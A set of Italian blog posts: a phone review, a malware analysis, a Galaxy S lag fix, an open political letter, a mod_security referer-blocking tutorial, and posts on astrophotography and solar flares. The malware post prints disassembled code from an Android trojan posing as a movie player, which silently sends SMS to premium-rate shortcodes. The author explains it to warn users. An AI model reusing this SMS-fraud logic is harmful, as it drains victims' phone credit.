Prima di cominciare è doverosa una premessa: l’articolo che leggerete non è una “marketta” non sono stato pagato, ne ho ottenuto alcun beneficio dai test effettuati. Il telefono dovrò restituirlo e non ho ricevuto gadget, sconti o niente di particolare come regalo. La recensione che leggerete sarà ovviamente dettata dai miei gusti soggettivi, ma senza alterazioni dovute ad accordi precedenti.

Chi segue questo blog avrà sicuramente letto che poco prima delle ferie sono stato contattato da euronics per il test di un Sony Ericsson X10 Mini Pro. Se può interessarvi Selene ha recensito prima di me la versione precedente ossia x10 mini [e basta], che è uguale al dispositivo che ho provato io, con in meno il tastierino qwerty fisico e qualche feature a livello di software.

Le caratteristiche:

• CPU: Qualcomm MSM7227, 600 MHz
• Dimensioni: 90.0 x 52.0 x 17.0 mm
• Peso: 120 gr
• Dimensioni display: 240 x 320 pixels (QVGA) con 16 milioni di colori
• Colorazione: Nero, Rosso, Bianco Perlato
• Memoria: Interna di 128Mb, Esterna fino a 16 Gb tramite supporto MicroSD, RAM di 256 Mb
• Autonomia dichiarata [tipo rete, tempo di conversazione, tempo in stand by]:
  

  GSM/GPRS/EDGE 850/900/1800/1900	4 ore	300 ore
  UMTS/HSPA 900/2100	3 ore 30 min	360 ore
  UMTS/HSPA 850/1900/2100	3 ore 30 min	360 ore
  Tempo di ascolto della musica: 17 ore 30 min

• Fotocamera: 5 Mpixel con flash led, autofocus e possibilità di registrazione video
• Sistema operativo: Android Donut 1.6
• Connettività: MicroUSB, Bluetooth 2.1, WiFi 802.11 b/g, aGPS
• Supporto Flash: no
• Radio: Si
• Riproduzione Video: DixX, XviD, MPEG4, H.263, H.264, WMV
• Riproduzione audio: MP3, e-AAC+, WMA, WMDRM, OMA DRM 2.1 con uscita jack 3,5 mm

Prime considerazioni:

L’interfaccia utente è la UXP, proprietaria sony. Bisogna innanzitutto dire che Sony Ericsson con la serie x10 mini ha puntato tutto su due parole chiavi “leggerezza” e “maneggevolezza” e devo dire che ci è riuscita, il telefono non ti accorgi nemmeno di averlo in tasca, ma anche se protetto da una custodia generosa, come quella fornitami in dotazione, non si rischia di mancare una notifica grazie alla potente vibrazione (e qui le battute infelici si sprecano ).

Questo X10 è un telefono entry-level tra gli android powered, e lo si capisce già dalle specifiche tecniche soprattutto per la presenza della versione 1.6 di Android (l’attuale è la 2.2 anche se la più diffusa al momento è la 2.1) ma ufficialmente Sony Ericsson ha dichiarato che nell’ultimo quadrimestre di quest’anno la serie X10 vedrà l’upgrade ad Eclair (2.1), quindi questo telefono entra di diritto tra le scelte di chi vuole un telefono piccolo e che non sia troppo datato sulla dotazione software.

Per accedere al vano batteria/sim/sdcard bisogna lottare un pò con la cover posteriore, in quanto è presente una tacchetta che ci agevola la possibilità di fare leva tramite una unghia, ma il sistema di incastro è cosi robusto da indurci a forzare parecchio, dandoci l’impressione che da un momento all’altro la cover si rompa ma possiamo stare tranquilli, sebbene in plastica la cover è abbastanza resistente e possiamo aprire il vano tutte le volte che vogliamo senza rompere nulla.

L’X10 Pro in più rispetto ai suoi fratelli, ha il tastierino qwerty fisico come dicevamo prima, tastierino che purtroppo si rende quasi sempre necessario a causa delle ridotte dimensioni del display; il tastierino virtuale infatti, se usato, occupa circa il 70% dello spazio, se poi ci aggiungiamo anche la barra delle notifiche e lo spazio “rubato” da altri pulsanti di servizio, viene facile immaginare come ad esempio durante la scrittura di un sms, la parte di schermo dedicata alla visione di ciò che si sta scrivendo è veramente poca.

L’apertura del dispositivo è “a slide”, bisogna far slittare una parte del telefono attraverso il lato più lungo per poter accedere al tastierino fisico, ed ho notato che il telefono non possiede un accelerometro/giroscopio, lo switch della visualizzazione in landscape o portrait avviene esclusivamente grazie al movimento a slitta non è vero, come mi è stato segnalato nei commenti da daniele, grazie. Nelle opzioni si può abilitare la rotazione dello schermo.

Il display e la reattività:

In linea generale il display è abbastanza responsivo al tocco, anche se ho notato che soprattutto durante il “wake” (quando cioè riaccendiamo il telefono dopo che è entrato in modalità stand-by) il telefono fa fatica a svegliarsi, primo fra tutti è il pulsante on/off che abbiamo sulla parte alta del telefono e che serve appunto a svegliare il dispositivo dallo stand-by, dopo che lo si preme bisogna aspettare qualche istante prima di veder accendere il display tanto che io, abituato alla reattività del mio htc legend, sono stato indotto le prime volte a premere più volte il pulsante pensando di non aver esercitato abbastanza pressione, ri-mandando il telefono in stand-by senza accorgermene, inoltre la parte alta dello schermo, quella usata dalla status bar ed usata per “tirare” in basso la tendina delle notifiche, a volte manca qualche tocco costringendoci a dover far scorrere il nostro ditino più volte con maggior precisione, mentre c’è da dire che per tutti gli altri settori del display la reattività è ottima, l’interfaccia UXP è parecchio fluida anche se, sempre per le ridotte dimensioni, possiamo inserire un solo widget per pagina ma possiamo modificare il numero di pagine a piacimento per inserire più widget.

Molto bella l’applicazione/widget chiamata timescape che è l’equivalente di friendstream per chi conosce la Sense UI della HTC, in un solo widget abbiamo raccolti gli stream dei social network facebook e twitter, più i messaggi email ed sms, veramente comoda.

L’uso quotidiano:

Devo ammettere che la presenza del tastierino fisico ha i suoi perchè, la scrittura degli sms, ed in generale la scrittura di tutto, è molto più veloce i tasti sono piccoli ma non troppo qundi non si rischia di premere 4 tasti per volta con il pollice.

L’audio nelle chiamate non ha difetti è abbastanza chiaro e non ci costringe a far urlare il nostro interlocutore

Per la produttività ho notato che è presente RoadSync Mail, un comodo strumento per sincronizzare i nostri account email via activesync sfruttando la tecnologia “direct push” per le email (ad esempio per chi in azienda usa Zimbra o Exchange), ma è possibile anche sincronizzare alla vecchia maniera normali account imap o pop.

La navigazione internet è veloce grazie al browser preinstallato che renderizza le pagine abbastanza agevolmente, purtroppo non supporta il pinch-zoom cioè la possibilità di zoomare o de-zoomare sulla pagina semplicemente “pizzicando” lo schermo con due dita, l’uso dei pulsanti zoom-in e zoom-out può risultare scomodo perchè molto più lento del pinch-zoom, ma non è niente di cosi grave, quello che secondo me è più grave è proprio l’assenza dell’accelerometro, che ci costringe a dover tenere aperto il tastierino per poter utilizzare il browser con visualizzazione in landscape (navigare con quello schermo cosi piccolo in modalità portrait è veramente scomodo, bisogna sempre scrollare la pagina in tutte le direzioni in quanto la parte visualizzata, ovviamente, è ridotta.) Come sopra

La fotocamera:

Chapeau a sony ericsson: sulla fotocamera non c’è nulla da criticare tranne, giusto per voler fare i pignoli a tutti i costi, l’autofocus che fa fatica se la composizione che abbiamo scelto non ha toni abbastanza contrastati, non riuscendo per l’appunto a mettere a fuoco [ma vi ricordo che stiamo parlando di uno smartphone non di una reflex, per di più entry level quindi possiamo benissimo soprassedere su questo particolare.].

Ma ci fa ricredere in tutte le altre situazioni, soprattutto per le foto panoramiche, dove l’autofocus è_una_scheggia, ci consente anche di mettere a fuoco oggetti molto vicini (fotografia macro .ndr), inoltre la fotocamera è accessibile direttamente tramite un apposito pulsantino su uno dei lati più lunghi del telefono, pulsante che ha la comoda funzione del blocco AF, quello che troviamo nelle normali macchine fotografiche; vale a dire che premendo parzialmente il pulsante la fotocamera mette a fuoco e blocca l’AF una volta finito, e poi premendo più forte per raggiungere il fine-corsa del pulsante si effettua lo scatto.

Considerazioni finali:

Il Sony Ericsson X10 mini pro è un buon telefono, chi cerca uno smartphone non eccessivo può puntare dritto su questo, in più viste le ridotte dimensioni è di una comodità assurda, giusto per rendere l’idea: io non sono famoso per avere una mano enorme ma riesco senza il minimo sforzo a chiudere la mano a mò di pugno con dentro il telefono

E’ un telefono però che deve piacere as-is vale a dire che non è per smanettoni, cosi è e cosi ce lo teniamo, non ha prestazioni elevate e quindi se siamo alla ricerca di un telefono che vogliamo avere aggiornato sempre all’ultima novità è meglio che ci orientiamo su altri dispositivi di fascia alta e soprattutto alziamo il nostro budget.

Se invece siamo dei nostalgici o semplicemente dei sostenitori del tastierino fisico l’x10 mini pro è quello che fa per noi, è poco più di un telefono normale grazie all’integrazione coi social network, la possibilità di condividere al volo le nostre foto/video tramite gli stessi, la possibilità di installare applicazioni/giochi gratuite e non tramite l’android market, con ben 16 gb di archiviazione esterna è un ottimo player multimediale consentendoci di poter lasciare a casa l’ipod di turno, il tutto spendendo una cifra che non è affatto eccessiva.

Da giorni si parla per la rete del primo trojan horse che ha infettato un sacco di telefoni android.

D’altronde è “normale” un evento del genere, android sta avendo una crescita esponenziale quindi è plausibile che questo faccia gola ad alcuni programmatori poco ortodossi, soprattutto perchè in ballo ci sono i soldi degli utenti finali.

Ma oggi non voglio parlarvi della notizia in se, quella già la sapete sicuramente, quello che voglio mostrarvi è il codice sorgente del software contenente il trojan, è incredibile constatare come il codice è poco più del classico programma d’esempio hello world distribuito con l’android SDK.

Jon Oberheide si è procurato appunto una copia di questa applicazione ed ha effettuato disassembling per capire il meccanismo del virus.

Package: RU.apk
Package Name: org.me.androidapplication1
Permissions Requested: android.permission.SEND_SMS
Contents:
    ./classes.dex
    ./res
    ./res/drawable
    ./res/drawable/icon.png
    ./res/layout
    ./res/layout/main.xml
    ./resources.arsc
    ./AndroidManifest.xml
    ./META-INF
    ./META-INF/MANIFEST.MF
    ./META-INF/CERT.RSA
    ./META-INF/CERT.SF

Jon dice che persino il file main.xml, che descrive il layout del pacchetto, contiene solo una TextView con scritto “Hello Android from NetBeans”. Dando un occhiata alle classi disassemblate si vede che:

[000924] org.me.androidapplication1.MoviePlayer.onCreate:(Landroid/os/Bundle;)V
...
000c: invoke-virtual {v6}, Lorg/me/androidapplication1/DataHelper;.canwe:()Z
000f: move-result v2
0010: if-eqz v2, 0040 // +0030

Appena l’applicazione parte, viene subito chiamata la funzione DataHelper.canwe(), questa funzione serve al trojan horse per capire se in passato ha già effettuato l’invio di sms fraudolenti o meno, il trojan registra i suoi dati in un db sqlite chiamato “movieplayer.db” con una singola tabella “table1″ ed una sola colonna “was”. Se la funzione canwe() determina in base ai dati sul db, che il trojan ha già operato in passato, viene annullata l’operazione e si salta subito alla riga 0040 che invoca la funzione finish().

0012: new-instance v9, Landroid/widget/TextView; // class@000e
0014: invoke-direct {v9, v12}, Landroid/widget/TextView;.<init>
0017: const-string v8, "?????????, ????????????? ?????? ? ?????????.."
0019: invoke-virtual {v9, v8}, Landroid/widget/TextView;.setText
001c: invoke-virtual {v12, v9}, Lorg/me/androidapplication1/MoviePlayer;.setContentView

Se invece il trojan “capisce” di non aver agito di recente, l’applicazione restituisce all’utente un pop-up con un messaggio in russo, che tradotto molto semplicemente significa “Richiesto l’accesso alla libreria video, attendere..“

001f: invoke-static {}, Landroid/telephony/SmsManager;.getDefault:()
0022: move-result-object v0
0023: const-string v1, "3353" // string@0001
0025: const-string v3, "798657" // string@0003
0027: const/4 v2, #int 0 // #0
0028: const/4 v4, #int 0 // #0
0029: const/4 v5, #int 0 // #0
002a: invoke-virtual/range {v0, v1, v2, v3, v4, v5}, Landroid/telephony/SmsManager;.sendTextMessage

Mentre l’ignaro utente aspetta, invitato appunto dalla text-box, credendo che il movieplayer sta costruendo una libreria di video contenuti nel telefono, il trojan inizia a mandare SMS verso una numerazione premium di nazionalità russa, queste numerazioni premium alla fine vengono a costare molto più di un normale SMS all’utente finale. Nella parte di codice qui sopra vediamo la numerazione alla stringa v1 mentre il contenuto dell’sms è rappresentato dalla stringa v3. Quindi in base al codice qui sopra il trojan invia un sms contenente “798657″ alla numerazione “3353″.

002d: const-string v1, "3354" // string@0002
002f: const/4 v2, #int 0 // #0
0030: const/4 v4, #int 0 // #0
0031: const/4 v5, #int 0 // #0
0032: invoke-virtual/range {v0, v1, v2, v3, v4, v5}, Landroid/telephony/SmsManager;.sendTextMessage

Poi viene mandato un altro sms ma alla numerazione “3354″

0035: const-string v1, "3353" // string@0001
0037: const/4 v2, #int 0 // #0
0038: const/4 v4, #int 0 // #0
0039: const/4 v5, #int 0 // #0
003a: invoke-virtual/range {v0, v1, v2, v3, v4, v5}, Landroid/telephony/SmsManager;.sendTextMessage

E giusto per sicurezza dopo manda un altro sms alla numerazione “3353″

003d: invoke-virtual {v6}, Lorg/me/androidapplication1/DataHelper;.was:()V
0040: invoke-virtual {v12}, Lorg/me/androidapplication1/MoviePlayer;.finish:()V
0043: return-void

Dopo che ha finito di fare la spesa il trojan inserisce un record con valore “was” dentro l’omonima colonna della tabella “table1″ del db. Questo dice al trojan, nelle future esecuzioni, di non effettuare l’invio di altri SMS premium, per evitare di destare troppi sospetti.

Ma noi utenti italiani possiamo stare tranquilli, primo perchè l’applicazione è già scomparsa dal market, secondo perchè la numerazione per l’appunto, è Russa, ed i telefoni italiani non sono capaci di comunicare con quello shortcode per ovvi motivi [le numerazioni sono a carattere nazionale.]

Quindi in sostanza il tanto decantato trojan non è nulla di cosi grave, l’abbiamo visto è il classico hello world leggermente modificato, è totalmente inefficace per noi, ed in più non ha nessun tipo di codice maligno dal punto di vista della sicurezza, non trasforma il nostro telefono in bot comandabile da remoto, non esegue codice arbitrario sul sistema.

Ma è un ottimo avviso per gli utenti ed i vendor, il trojan è stato concepito come una frode, ed in quanto tale su parte degli utenti europei ha funzionato. Quindi come al solito noi utenti stiamo attenti [và che rima], se andando ad installare un mediaplayer vediamo che questo ci chiede di poter usare il GPS, o gli sms, o l’email o qualsiasi altro servizio che non serve ad un mediaplayer, qualche domanda facciamocela.

I vendor invece hanno un ottima occasione per studiare il codice di questi software malevoli ed architettare contromisure sempre più efficaci, e perchè no, anche per google stessa che magari dovrebbe effettuare un pò più di controlli su ciò che viene inserito all’interno dei suoi market.

A quanto pare lo staff di xda-developers ha risolto i problemi di “lag” di cui soffrono i recentissimi samsung galaxy S.

La cosa è quantomeno curiosa, il telefono che -al momento- sembra essere il più potente nel campo android (e probabilmente anche in generale) soffre di problemi di latenza nell’uso di tutti i giorni, durante l’esecuzione dell’interfaccia touchwiz, l’interfaccia utente installata da samsung sui suoi dispositivi con android equipaggiato.

Adesso le cose sono cambiate, su xda è stato rilasciato -ancora in fase BETA- il “lag fix” un pacchetto semplicissimo da usare, lo si scarica sul proprio pc, si connette il proprio Galaxy S con la modalità usb-debug attivata, si lancia lo script lagfixme.bat e si aspetta…

Alla fine si ha il proprio telefono che letteralmente vola, come ci dimostra un benchmark effettuato da un utente che lo ha testato

Si avete visto bene, le prestazioni grazie al lag-fix sono quasi il doppio di un nexus one con froyo installato!

Il tweak è relativamente semplice, ed usa il vecchio concetto di “swap” anche se sotto un altra chiave di lettura. Lanciando il fix viene creata una partizione EXT2 sulla memoria interna del telefono, all’interno del filesystem RFS presente di default, con una dimensione dei blocchi di 4kbyte. Cosi facendo si va a creare un buffer tra il sistema operativo android e il “vero” filesystem su cui sono presenti fisicamente i dati, riducendo quindi il numero di I/O necessari per tutte le operazioni, proprio perchè viene sfruttato il buffer del filesystem di tipo EXT2.

L’unico difetto è che per come sono allo stato attuale le cose, lo spazio disponibile per i dati delle applicazioni si dimezza da 2GB a 1 solo. Ma ad essere sinceri 1GB per i dati delle applicazioni sono più che sufficienti, soprattutto quando si parla di far letteralmente schizzare le prestazioni del proprio telefono.

Secondo gli sviluppatori i pregi sono:

1. Non richiede una SD esterna [il fix]
2. Si può togliere e rimettere la SD esterna dal telefono senza che le applicazioni vadano in crash
3. Ovviamente più velocità, come si vede dallo screenshot qui sopra
4. Miglior gestione della batteria, non richiedendo una SDcard esterna perennemente attiva la capacità della batteria viene consumata meno in fretta.

Il fix funziona sia su rom Eclair (2.1, quella stock) che su Froyo (2.2), l’importante è che siano rootate, ed abbiano busybox installato (almeno versione 1.17.1).

Lo script è un batch quindi o ci si modifica lo script, semplice da leggere a detta degli sviluppatori, per farlo girare su linux oppure ci si procura una macchina windows per poterlo lanciare. Analogamente all’operazione di fix c’è anche quella di un-fix, ossia si può far tornare il telefono alle condizioni originali, basta lanciare lo script unlagfixme.bat

Problemi noti

• Se non si ha almeno 1GB di spazio libero dentro la partizione /data il fix non riuscirà ad applicarsi con successo
• Se non si ha una versione di busybox che abbia al suo interno il comando mkfs.ext2 non si potrà creare appunto la partizione, fallendo la procedura.
• Il fix non funzionerà se si ha già installato il mimocan’s fix, istruzioni su come rimuoverlo qui
• Se la procedura fallisce con un “permission denied” significa che non si ha la modalità usb-debug attiva o non sono installati correttamente i driver usb [quest'ultimo problema riguarda windows perchè su linux fino adesso non sono necessari driver per android]

Mi rifaccio al tumblr dell’amico Bl@ster.

“Egregio Signor Presidente del Consiglio,

le scrivo su un giornale che lei non legge, eppure qualche parola gliela devo, perché venerdì il suo disinvolto senso dello humor ha toccato persone a me molto care: “le belle ragazze albanesi” 2. Mentre il premier del mio paese d’origine, Sali Berisha, confermava l’impegno del suo esecutivo nella lotta agli scafisti, lei ha puntualizzato che “per chi porta belle ragazze possiamo fare un’eccezione.”

Io quelle “belle ragazze” le ho incontrate, ne ho incontrate a decine, di notte e di giorno, di nascosto dai loro magnaccia, le ho seguite da Garbagnate Milanese fino in Sicilia. Mi hanno raccontato sprazzi delle loro vite violate, strozzate, devastate. A “Stella” i suoi padroni avevano inciso sullo stomaco una parola: puttana. Era una bella ragazza con un difetto: rapita in Albania e trasportata in Italia, si rifiutava di andare sul marciapiede. Dopo un mese di stupri collettivi ad opera di magnaccia albanesi e soci italiani, le toccò piegarsi. Conobbe i marciapiedi del Piemonte, del Lazio, della Liguria, e chissà quanti altri. E’ solo allora – tre anni più tardi – che le incisero la sua professione sulla pancia: così, per gioco o per sfizio.

Ai tempi era una bella ragazza, sì. Oggi è solo un rifiuto della società, non si innamorerà mai più, non diventerà mai madre e nonna. Quel puttana sulla pancia le ha cancellato ogni barlume di speranza e di fiducia nell’uomo, il massacro dei clienti e dei protettori le ha distrutto l’utero.

Sulle “belle ragazze” scrissi un romanzo, pubblicato in Italia con il titolo Sole bruciato. Anni più tardi girai un documentario per la tivù svizzera: andai in cerca di un’altra bella ragazza, si chiamava Brunilda, suo padre mi aveva pregato in lacrime di indagare su di lei. Era un padre come tanti altri padri albanesi ai quali erano scomparse le figlie, rapite, mutilate, appese a testa in giù in macellerie dismesse se osavano ribellarsi. Era un padre come lei, Presidente, solo meno fortunato. E ancora oggi il padre di Brunilda non accetta che sua figlia sia morta per sempre, affogata in mare o giustiziata in qualche angolo di periferia. Lui continua a sperare, sogna il miracolo. E’ una storia lunga, Presidente… Ma se sapessi di poter contare sulla sua attenzione, le invierei una copia del mio libro, o le spedirei il documentario, o farei volentieri due chiacchiere con lei. Ma l’avviso, signor Presidente: alle battute rispondo, non le ingoio.

In nome di ogni Stella, Bianca, Brunilda e delle loro famiglie queste poche righe gliele dovevo. In questi vent’anni di difficile transizione l’Albania s’è inflitta molte sofferenze e molte ferite con le sue stesse mani, ma nel popolo albanese cresce anche la voglia di poter finalmente camminare a spalle dritte e testa alta. L’Albania non ha più pazienza né comprensione per le umiliazioni gratuite. Credo che se lei la smettesse di considerare i drammi umani come materiale per battutacce da bar a tarda ora, non avrebbe che da guadagnarci.”

Il tutto si rifà all’ennesima performance del premier (si, lo scrivo con la minuscola, non si merita questo titolo secondo me.) durante l’incontro con Berisha, il primo ministro Albanese.

Questa è la “persona” che ci governa, questa è la “persona” che ci rappresenta pubblicamente a livello mondiale. Spero che almeno siate contenti voi che l’avete votato alle scorse elezioni.

Noi coglioni comunisti preferiamo rimanere coglioni ai vostri occhi piuttosto che dare credito a persone del genere.

Dopo tanto tempo ecco a voi un “tutorial per sysadmin“, oggi vediamo come bloccare dei potenziali attacchi di tipo indiretto.

Cosa significa attacco indiretto? Significa che non c’è un attacco che parte da un punto preciso e finisce sul nostro server, in un attacco spam via referral link chi ti attacca fisicamente, ed inconsapevolmente, sono gli stessi utenti che visitano il tuo sito.

Vi porto l’esempio di un attacco che ho dovuto gestire fino a ieri sera. 3 giorni fa poco dopo l’ora di pranzo mi chiamano segnalando che il sito istituzionale di $cliente non si vede più.

Questo è un sito grosso, piazzato su un cluster altrettanto grosso, solo le macchine del front end sono 4 e non sono macchine comprate da mediaworld, sono dei mini carro armati.

Quindi quando mi si dice “il sito è giù” rimango alquanto basito, collegandomi sui bilanciatori vedo che in maniera abbastanza randomica l’apache che fa da reverse proxy non riesce più a contattare la porta 80 di alcune macchine del front end, ed in effetti con un semplice telnet finisco con un timeout.

Per tagliarla corta, dopo ore ed ore di analisi abbiamo visto che molti errori venivano generati da chiamate GET che avevano come referral link un motore di ricerca di inserzioni online.

Consultandomi con gli sviluppatori vengo a sapere che l’url verso cui sono dirette le GET è una landing page di una campagna di affiliazione via banner, lanciata da $cliente, ne consegue quindi che questo motore di ricerca deve essersi iscritto a questa campagna; peccato che visitandolo del banner in questione non ve n’è traccia.

Il sospetto è quindi che i furbacchioni abbiano prelevato il codice del banner e l’abbiano nascosto in qualche maniera nel codice delle pagine, in modo che ad ogni pagina visitata sul motore parta un click “fasullo” sul banner. Basta avere un motore di ricerca che fa tante visite ed ecco che automaticamente la truffa si tramuta in attacco.

Il sito istituzionale di $cliente è gestito da application server java [sigh] i quali dovendo gestire un throughput di GET mastodontico entro breve tempo saturavano la memoria messa a disposizione dalla JVM (Java Virtual Machine) facendo si che le GET si accodassero, mandando successivamente in blocco la porta 80, e quindi rendendo il sito inaccessibile.

Qui non si può filtrare semplicemente via firewall, perchè come detto prima l’attacco è indiretto, non parte dai server del motore di ricerca ma sono gli utenti che vengono dirottati sul sito che attaccano il sito stesso.

L’unica soluzione è quindi adottare il mod_security di apache2 e filtrare le GET in entrata basandosi sul referral link, in modo che le chiamate “dirottate” dal motore di ricerca non vengano processate dal web service java e vengano direttamente rimbalzate con errore di tipo 500.

Una volta su debian bastava installare libapache2_mod-security via apt-get, ma su lenny sembra che questi pacchetti non siano più presenti, e quindi bisogna prelevarli tramite il sito ufficiale di mod security [mirror per i pacchetti debian] ed installarli via “dpkg -i“

Installati i pacchetti è sufficiente creare un file chiamato mod_security dentro /etc/apache2/conf.d e scriverci dentro:

<IfModule mod_security.c>

# mod_security configuration directives

# …

# Turn the filtering engine On or Off

SecFilterEngine On

# Some sane defaults

#Check if URL characters where encoded

SecFilterCheckURLEncoding On

#Check UTF-8 encoding

SecFilterCheckUnicodeEncoding Off

#Allow 1 byte characters

# Accept almost all byte values

SecFilterForceByteRange 0 255

# Server masking is optional

# SecServerSignature “Microsoft-IIS/0.0″

SecAuditEngine RelevantOnly

# The name of the audit log file

SecAuditLog /var/log/apache2/audit_log

# You normally won’t need debug logging

# Debug level set to a minimum

SecFilterDebugLog /var/log/apache2/modsec_debug_log

SecFilterDebugLevel 0

# Should mod_security inspect POST payloads

SecFilterScanPOST On

# By default log and deny suspicious requests

# with HTTP status 500

SecFilterDefaultAction “deny,log,status:500″

# Blocco il referral nasone.it

SecFilterSelective “HTTP_REFERER” “domain.tld”

</IfModule>

Compilato il file salviamolo e riavviamo apache, e da questo momento le chiamate in questione verranno filtrate, potete vedere se il filtro funziona tramite il file di log impostato nella configurazione sopra o più semplicemente vedendo le chiamate che arrivano nei file di accesso al virtual host di apache, vedrete che le GET da questo momento in poi non otterranno più un codice 200 ma 500.

Quando uno è appassionato di astronomia e di fotografia, inevitabilmente, finisce con il praticare l’astrofotografia.

Io infatti sto programmando una nottata di astrofotografia, giù in calabria a casa mia, alla caccia del centro della via lattea. E piano piano quindi con mesi di risparmi mi sono imbastito l’attrezzatura necessaria.

Come fotocamera userò la mia fidatissima Canon 1000d, il parco obiettivi mi copre tutte le focali da 18 a 250 mm, grazie ad unieuro mi sono comprato anche un treppiede hama di discreto livello, l’unica cosa che mi mancava era lo scatto remoto.

Per fare foto astronomiche infatti bisogna fare diversi scatti con esposizioni che variano dai 15 secondi a svariati minuti; e stare 15 secondi col ditino sul pulsante per tenere l’otturatore aperto non è il massimo, sia perchè verrebbero fuori foto vomitevoli per le immagini mosse, e sia perchè effettivamente è stancante.

La soluzione quindi si chiama tether shooting, o scatto remoto per l’appunto, le alternative sono due:

1. comprare un telecomando da collegare alla fotocamera
2. fare tutto col piccì

Indovinate quale soluzione ho scelto io?

A dir la verità la mia scelta fino a ieri propendeva per la prima soluzione, ma c’erano troppe variabili pericolose in gioco, perchè ad esempio per catturare la via Lattea bisogna alternare tempi di esposizione a tempi di riposo, quindi per 15/20 secondi avrei dovuto tenere il pulsantino premuto per aprire l’otturatore, per un altra trentina avrei dovuto rilasciarlo per chiuderlo e far raffreddare il sensore, e cosi via svariate volte. Il rischio di errore è molto alto.

Ci sono dei telecomandi programmabili, ma costano un troiaio ed io non ho ne la voglia ne la possibilità di investire cosi tanti soldi.

Sapevo che tramite pc si potevano usare software appositi, la Canon stessa tramite il software in dotazione Digital Photo Professional con le “EOS Utility” ti consente di programmare la sequenza degli scatti. Ma purtroppo DPP, come quasi tutti i software, gira solo su windows;

Ma con una googlata e grazie all’aiuto della lega nerd sono venuto a conoscenza di due software che sono nativi per linux e che a prima vista sembrano fantastici.

Il primo si chiama Darktable è un software per la gestione e la modifica delle proprie foto, è molto simile ad Adobe LightRoom e consente pure di fare tether shooting, purtroppo però solo con alcune macchine al momento (è una funzione in stato sperimentale), è molto leggero ed è molto potente allo stesso tempo, per me che uso sempre scatti in formato RAW è comodissimo per la modifica dei livelli, del bilanciamento dei bianchi e tutto quello che un software di fotoritocco ti consente di fare.

Il secondo invece si chiama GTimeLapse è un tool scritto in GTK che si appoggia a libgphoto e le WxWidgets per collegarsi via usb alla fotocamera e programmarne gli scatti. L’ho provato programmando una serie di 20 scatti in varie modalità (1 ogni 5 secondi e 2 ogni 5 secondi), funziona senza battere ciglio, rileva le impostazioni di fuoco della fotocamera (è possibile anche modificarle dal software e far scattare la fotocamera con le impostazioni di fuoco personalizzate) e visualizza al volo gli scatti su schermo, questo però solo se si scatta in jpeg, non ha purtroppo la possibilità di gestire gli scatti effettuati in RAW (che la canon registra in files .CR2).

Ecco adesso il mio corredo può dirsi completato, per ora, e non vedo l’ora di fare la notturna con fotocamera, piccì, e la via Lattea che mi guarda dall’alto

Probabilmente alcuni di voi sapranno che nella notte tra il 3 ed il 4 agosto era prevista un eruzione solare.

Come al solito non mancano le sparate di Tiscali Notizie che vaneggia su uno “tsunami solare“, da dove abbiano preso questo termine però non si sa bene, quello che sappiamo è che Tiscali non è nuova a questo genere di notizie

In realtà c’è ben poco di tsunami, per citare Attivissimo:

Quella di oggi [l'eruzione ndr.] è “importante” (“major” in originale), ma è un ruttino rispetto alla “eruzione solare veramente grande” che potrebbe causare danni.

E siccome a me piace parlare di scienza e non di fantascienza vi allego un breve filmato registrato da una delle sonde “surveyor” della NASA che, come avrete intuito, questa eruzione se l’aspettava da tempo, e se fosse stata veramente devastante come si dice avrebbe fatto girare la notizia per correre ai ripari, ma si sa il sensazionalismo vende quindi chi se ne frega se c’è gente che leggendo la parola tsunami si caga in mano.

Ma vediamo un pò di cosa stiamo parlando, quella inquadrata si chiama CME che sta per Coronal Mass Ejection, per gli amici Espulsione di Massa Coronale.

Quando Attivissimo dice che il Sole ha fatto un ruttino usa una metafora, ma in reatà il sole fa veramente un ruttino, la nostra stella infatti brilla come sappiamo a causa delle reazioni di fusione nucleare che avvengono al suo interno, e quindi è come uno stomaco in eterna fase digestiva, ogni tanto l’attività digestiva (leggasi attività solare) arriva a dei picchi causando, appunto, il ruttino proprio come lo facciamo noi esseri umani.

La roba che viene espulsa e che noi vediamo di colore bianco è plasma costituito principalmente da elettroni e protoni [Wikipedia], questo plasma viene eiettato anche in direzione della Terra, ma niente paura, il campo magnetico che ci avvolge è capace di sopportare e neutralizzare ruttini anche ben più grossi di questo, anzi è un ottima occasione per chi sta a determinate latitudini del nostro pianeta, di osservare spettacolari aurore polari dovute all’interazione dei protoni e degli elettroni del plasma solare che si scontrano col nostro campo magnetico terrestre.

Update: Andry nei commenti mi segnala questa gallery su spaceweather con immagini stupende di aurore polari, come potete vedere di eruzioni solari ne abbiamo avute parecchie, e fin’ora non è successa nessuna tragedia

Stamattina arrivo in ufficio e come al solito passo qualche minuto a cazzeggiare prima di immergermi nel “meraviglioso mondo del lavoro”. Tra le operazioni di cazzeggio c’è, ovviamente, la connessione a Friendfeed; apro la home page e mi ritrovo un nuovo messaggio privato, clicco e…

Ebbene si, chi gestisce l’account di euronics su friendfeed ha [ben] pensato di contattarmi per proporre un test, è la prima volta che il test mi viene proposto, di solito mi ci candido personalmente quando vedo annunci e quindi la cosa inorgoglisce non poco.

Tra l’altro il messaggio l’ho letto in mattinata e come vedete reca la scritta “11 ore fa” vale a dire che chi mi ha scritto l’ha fatto in tarda serata, ma questi qui non si riposano mai?

La cosa ancora più sconcertante è che in mattinata sono stato contattato (o meglio ho risposto al primo contatto), e dopo pranzo (intorno alle 15) avevo già il telefono in mano, spedizione letteralmente lampo.

L’occasione capita proprio “a ciccio” per citare la mia ragazza, visto che il 13 entro in ferie è un ottima occasione per vedere se un X10 mini pro è un buon compagno di viaggio.

Per adesso quindi ringrazio euronics e, presumibilmente dopo le vacanze, tirerò fuori una bella review del dispositivo.

Scrivo questo articolo al volo, ho già dedicato abbastanza tempo a questa faccenda ma come sempre, queste sono cose che si devono sapere.

Da un mesetto a questa parte l’azienda (credetemi che ho fatto uno sforzo enorme a definirla tale) tophost ha scatenato un putiferio sulla rete, a causa dei suoi comportamenti nei confronti dei suoi stessi clienti paganti.

Ieri come si vede dagli update all’articolo linkato, ho avuto una discussione su friendfeed con le persone che gestiscono l’utenza “tophost” sul social network. Il mio intento era cercare di far capire che cosi facendo non fanno altro che ottenere un immensa figura di merda di fronte agli stessi clienti che gli danno da mangiare ma niente, dopo un piccolo barlume di speranza l’ “azienda” è tornata sui suoi passi.

Un lettore di questo blog infatti mi scrive facendomi notare l’ennesimo sfottò, questa volta nei miei confronti:

Come al solito, quando ci sono persone ed articoli che lodano tophost retwittano e diffondono molto volentieri, non appena qualcuno inizia ad opporre qualche critica inizia a beccarsi le prese in giro, gli insulti e le diffamazioni.

